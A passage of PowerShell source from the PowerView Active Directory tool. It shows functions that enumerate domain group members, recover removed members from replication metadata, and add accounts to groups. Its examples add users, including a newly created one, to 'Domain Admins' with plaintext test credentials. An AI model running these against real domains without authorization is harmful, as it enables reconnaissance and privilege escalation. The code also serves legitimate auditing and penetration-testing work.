if ($PSBoundParameters['ServerTimeLimit']) { $ACLArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $ACLArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $ACLArguments['Credential'] = $Credential }
# # TODO: correct!
# # find the ACLs that relate to the ability to write to the group
# $xacl = Get-DomainObjectAcl @ACLArguments -Verbose
# # $ACLArguments
# # double-check that the manager
# if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AceType -eq 'AccessAllowed' -and ($xacl.ObjectSid -eq $GroupManager.objectsid)) {
# $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $True
# }
# else {
# $ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' $False
# }
$ManagedGroup | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN'
$ManagedGroup.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup')
$ManagedGroup
}
}
}
function Get-DomainGroupMember {
<#
.SYNOPSIS
Return the members of a specific domain group.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for the specified
group matching the criteria. Each result is then rebound and the full user
or group object is returned.
.PARAMETER Identity
A SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
specifying the group to query for. Wildcards accepted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER Recurse
Switch. If the group member is a group, recursively try to query its members as well.
.PARAMETER RecurseUsingMatchingRule
Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse.
Much faster than manual recursion, but doesn't reveal cross-domain groups,
and only returns user accounts (no nested group objects themselves).
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainGroupMember "Desktop Admins"
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : Testing Group
MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
MemberObjectClass : group
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : arobbins.a
MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
.EXAMPLE
'Desktop Admins' | Get-DomainGroupMember -Recurse
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : Testing Group
MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
MemberObjectClass : group
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129
GroupDomain : testlab.local
GroupName : Testing Group
GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : harmj0y
MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : arobbins.a
MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
.EXAMPLE
Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : harmj0y
MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108
GroupDomain : testlab.local
GroupName : Desktop Admins
GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local
MemberDomain : testlab.local
MemberName : arobbins.a
MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112
.EXAMPLE
Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember
.EXAMPLE
'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins'
.EXAMPLE
Get-Domain | Select-Object -Expand name
testlab.local
'dev\domain admins' | Get-DomainGroupMember -Verbose
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainGroupMember] Extracted domain 'dev.testlab.local' from 'dev\domain admins'
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins)))
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local)))
GroupDomain : dev.testlab.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
MemberDomain : dev.testlab.local
MemberName : user1
MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local)))
GroupDomain : dev.testlab.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
MemberDomain : dev.testlab.local
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-339048670-1233568108-4141518690-500
.OUTPUTS
PowerView.GroupMember
Custom PSObject with translated group member property fields.
.LINK
http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.GroupMember')]
[CmdletBinding(DefaultParameterSetName = 'None')]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Parameter(ParameterSetName = 'ManualRecurse')]
[Switch]
$Recurse,
[Parameter(ParameterSetName = 'RecurseUsingMatchingRule')]
[Switch]
$RecurseUsingMatchingRule,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{
'Properties' = 'member,samaccountname,distinguishedname'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
$ADNameArguments = @{}
if ($PSBoundParameters['Domain']) { $ADNameArguments['Domain'] = $Domain }
if ($PSBoundParameters['Server']) { $ADNameArguments['Server'] = $Server }
if ($PSBoundParameters['Credential']) { $ADNameArguments['Credential'] = $Credential }
}
PROCESS {
$GroupSearcher = Get-DomainSearcher @SearcherArguments
if ($GroupSearcher) {
if ($PSBoundParameters['RecurseUsingMatchingRule']) {
$SearcherArguments['Identity'] = $Identity
$SearcherArguments['Raw'] = $True
$Group = Get-DomainGroup @SearcherArguments
if (-not $Group) {
Write-Warning "[Get-DomainGroupMember] Error searching for group with identity: $Identity"
}
else {
$GroupFoundName = $Group.properties.item('samaccountname')[0]
$GroupFoundDN = $Group.properties.item('distinguishedname')[0]
if ($PSBoundParameters['Domain']) {
$GroupFoundDomain = $Domain
}
else {
# if a domain isn't passed, try to extract it from the found group distinguished name
if ($GroupFoundDN) {
$GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
}
}
Write-Verbose "[Get-DomainGroupMember] Using LDAP matching rule to recurse on '$GroupFoundDN', only user accounts will be returned."
$GroupSearcher.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupFoundDN))"
$GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName'))
$Members = $GroupSearcher.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]}
}
$Null = $SearcherArguments.Remove('Raw')
}
else {
$IdentityFilter = ''
$Filter = ''
$Identity | Where-Object {$_} | ForEach-Object {
$IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
if ($IdentityInstance -match '^S-1-') {
$IdentityFilter += "(objectsid=$IdentityInstance)"
}
elseif ($IdentityInstance -match '^CN=') {
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
# if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
# and rebuild the domain searcher
$IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
Write-Verbose "[Get-DomainGroupMember] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
$SearcherArguments['Domain'] = $IdentityDomain
$GroupSearcher = Get-DomainSearcher @SearcherArguments
if (-not $GroupSearcher) {
Write-Warning "[Get-DomainGroupMember] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
}
elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
$GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
$IdentityFilter += "(objectguid=$GuidByteString)"
}
elseif ($IdentityInstance.Contains('\')) {
$ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
if ($ConvertedIdentityInstance) {
$GroupDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
$GroupName = $IdentityInstance.Split('\')[1]
$IdentityFilter += "(samAccountName=$GroupName)"
$SearcherArguments['Domain'] = $GroupDomain
Write-Verbose "[Get-DomainGroupMember] Extracted domain '$GroupDomain' from '$IdentityInstance'"
$GroupSearcher = Get-DomainSearcher @SearcherArguments
}
}
else {
$IdentityFilter += "(samAccountName=$IdentityInstance)"
}
}
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
$Filter += "(|$IdentityFilter)"
}
if ($PSBoundParameters['LDAPFilter']) {
Write-Verbose "[Get-DomainGroupMember] Using additional LDAP filter: $LDAPFilter"
$Filter += "$LDAPFilter"
}
$GroupSearcher.filter = "(&(objectCategory=group)$Filter)"
Write-Verbose "[Get-DomainGroupMember] Get-DomainGroupMember filter string: $($GroupSearcher.filter)"
try {
$Result = $GroupSearcher.FindOne()
}
catch {
Write-Warning "[Get-DomainGroupMember] Error searching for group with identity '$Identity': $_"
$Members = @()
}
$GroupFoundName = ''
$GroupFoundDN = ''
if ($Result) {
$Members = $Result.properties.item('member')
if ($Members.count -eq 0) {
# ranged searching, thanks @meatballs__ !
$Finished = $False
$Bottom = 0
$Top = 0
while (-not $Finished) {
$Top = $Bottom + 1499
$MemberRange="member;range=$Bottom-$Top"
$Bottom += 1500
$Null = $GroupSearcher.PropertiesToLoad.Clear()
$Null = $GroupSearcher.PropertiesToLoad.Add("$MemberRange")
$Null = $GroupSearcher.PropertiesToLoad.Add('samaccountname')
$Null = $GroupSearcher.PropertiesToLoad.Add('distinguishedname')
try {
$Result = $GroupSearcher.FindOne()
$RangedProperty = $Result.Properties.PropertyNames -like "member;range=*"
$Members += $Result.Properties.item($RangedProperty)
$GroupFoundName = $Result.properties.item('samaccountname')[0]
$GroupFoundDN = $Result.properties.item('distinguishedname')[0]
if ($Members.count -eq 0) {
$Finished = $True
}
}
catch [System.Management.Automation.MethodInvocationException] {
$Finished = $True
}
}
}
else {
$GroupFoundName = $Result.properties.item('samaccountname')[0]
$GroupFoundDN = $Result.properties.item('distinguishedname')[0]
$Members += $Result.Properties.item($RangedProperty)
}
if ($PSBoundParameters['Domain']) {
$GroupFoundDomain = $Domain
}
else {
# if a domain isn't passed, try to extract it from the found group distinguished name
if ($GroupFoundDN) {
$GroupFoundDomain = $GroupFoundDN.SubString($GroupFoundDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
}
}
}
}
ForEach ($Member in $Members) {
if ($Recurse -and $UseMatchingRule) {
$Properties = $_.Properties
}
else {
$ObjectSearcherArguments = $SearcherArguments.Clone()
$ObjectSearcherArguments['Identity'] = $Member
$ObjectSearcherArguments['Raw'] = $True
$ObjectSearcherArguments['Properties'] = 'distinguishedname,cn,samaccountname,objectsid,objectclass'
$Object = Get-DomainObject @ObjectSearcherArguments
$Properties = $Object.Properties
}
if ($Properties) {
$GroupMember = New-Object PSObject
$GroupMember | Add-Member Noteproperty 'GroupDomain' $GroupFoundDomain
$GroupMember | Add-Member Noteproperty 'GroupName' $GroupFoundName
$GroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupFoundDN
if ($Properties.objectsid) {
$MemberSID = ((New-Object System.Security.Principal.SecurityIdentifier $Properties.objectsid[0], 0).Value)
}
else {
$MemberSID = $Null
}
try {
$MemberDN = $Properties.distinguishedname[0]
if ($MemberDN -match 'ForeignSecurityPrincipals|S-1-5-21') {
try {
if (-not $MemberSID) {
$MemberSID = $Properties.cn[0]
}
$MemberSimpleName = Convert-ADName -Identity $MemberSID -OutputType 'DomainSimple' @ADNameArguments
if ($MemberSimpleName) {
$MemberDomain = $MemberSimpleName.Split('@')[1]
}
else {
Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
$MemberDomain = $Null
}
}
catch {
Write-Warning "[Get-DomainGroupMember] Error converting $MemberDN"
$MemberDomain = $Null
}
}
else {
# extract the FQDN from the Distinguished Name
$MemberDomain = $MemberDN.SubString($MemberDN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
}
}
catch {
$MemberDN = $Null
$MemberDomain = $Null
}
if ($Properties.samaccountname) {
# forest users have the samAccountName set
$MemberName = $Properties.samaccountname[0]
}
else {
# external trust users have a SID, so convert it
try {
$MemberName = ConvertFrom-SID -ObjectSID $Properties.cn[0] @ADNameArguments
}
catch {
# if there's a problem contacting the domain to resolve the SID
$MemberName = $Properties.cn[0]
}
}
if ($Properties.objectclass -match 'computer') {
$MemberObjectClass = 'computer'
}
elseif ($Properties.objectclass -match 'group') {
$MemberObjectClass = 'group'
}
elseif ($Properties.objectclass -match 'user') {
$MemberObjectClass = 'user'
}
else {
$MemberObjectClass = $Null
}
$GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
$GroupMember | Add-Member Noteproperty 'MemberName' $MemberName
$GroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDN
$GroupMember | Add-Member Noteproperty 'MemberObjectClass' $MemberObjectClass
$GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID
$GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember')
$GroupMember
# if we're doing manual recursion
if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) {
Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN"
$SearcherArguments['Identity'] = $MemberDN
$Null = $SearcherArguments.Remove('Properties')
Get-DomainGroupMember @SearcherArguments
}
}
}
$GroupSearcher.dispose()
}
}
}
function Get-DomainGroupMemberDeleted {
<#
.SYNOPSIS
Returns information on group members that were removed from the specified
group identity. Accomplished by searching the linked attribute replication
metadata for the group using Get-DomainObjectLinkedAttributeHistory.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObjectLinkedAttributeHistory
.DESCRIPTION
Wraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute
replication metadata for the specified group. These are cases where the
'Version' attribute of group member in the replication metadata is even.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainGroupMemberDeleted | Group-Object GroupDN
Count Name Group
----- ---- -----
2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test...
3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t...
.EXAMPLE
Get-DomainGroupMemberDeleted "Domain Admins" -Domain testlab.local
GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
MemberDN : CN=testuser,CN=Users,DC=testlab,DC=local
TimeFirstAdded : 2017-06-13T23:07:43Z
TimeDeleted : 2017-06-13T23:26:17Z
LastOriginatingChange : 2017-06-13T23:26:17Z
TimesAdded : 2
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
MemberDN : CN=dfm,CN=Users,DC=testlab,DC=local
TimeFirstAdded : 2017-06-13T22:20:02Z
TimeDeleted : 2017-06-13T23:26:17Z
LastOriginatingChange : 2017-06-13T23:26:17Z
TimesAdded : 5
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
.OUTPUTS
PowerView.DomainGroupMemberDeleted
Custom PSObject with translated replication metadata fields.
.LINK
https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.DomainGroupMemberDeleted')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{
'Properties' = 'msds-replvaluemetadata','distinguishedname'
'Raw' = $True
'LDAPFilter' = '(objectCategory=group)'
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
Get-DomainObject @SearcherArguments | ForEach-Object {
$ObjectDN = $_.Properties['distinguishedname'][0]
ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {
$TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue
if ($TempObject) {
if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) {
$Output = New-Object PSObject
$Output | Add-Member NoteProperty 'GroupDN' $ObjectDN
$Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn
$Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated
$Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted
$Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
$Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2)
$Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
$Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted')
$Output
}
}
else {
Write-Verbose "[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'"
}
}
}
}
}
function Add-DomainGroupMember {
<#
.SYNOPSIS
Adds a domain user (or group) to an existing domain group, assuming
appropriate permissions to do so.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-PrincipalContext
.DESCRIPTION
First binds to the specified domain context using Get-PrincipalContext.
The bound domain context is then used to search for the specified -GroupIdentity,
which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For
each entry in -Members, each member identity is similarly searched for and added
to the group.
.PARAMETER Identity
A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)
specifying the group to add members to.
.PARAMETER Members
One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName
(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114),
or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).
.PARAMETER Domain
Specifies the domain to use to search for user/group principals, defaults to the current domain.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
Adds harmj0y to 'Domain Admins' in the current domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred
Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred
Creates the 'andy' user with the specified description and password, using the specified
alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember
and the alternate credentials.
.LINK
http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True)]
[Alias('GroupName', 'GroupIdentity')]
[String]
$Identity,
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('MemberIdentity', 'Member', 'DistinguishedName')]
[String[]]
$Members,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$ContextArguments = @{
'Identity' = $Identity
}
if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain }
if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential }
$GroupContext = Get-PrincipalContext @ContextArguments
if ($GroupContext) {
try {
$Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity)
}
catch {
Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_"
}
}
}
PROCESS {
if ($Group) {
ForEach ($Member in $Members) {
if ($Member -match '.+\\.+') {
$ContextArguments['Identity'] = $Member
$UserContext = Get-PrincipalContext @ContextArguments
if ($UserContext) {
$UserIdentity = $UserContext.Identity
}
}
else {
$UserContext = $GroupContext
$UserIdentity = $Member
}
Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'"
$Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity)
$Group.Members.Add($Member)
$Group.Save()
}
}
}
}
function Get-DomainFileServer {
<#
.SYNOPSIS
Returns a list of servers likely functioning as file servers.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher
.DESCRIPTION
Returns a list of likely fileservers by searching for all users in Active Directory
with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
the server names.
.PARAMETER Domain
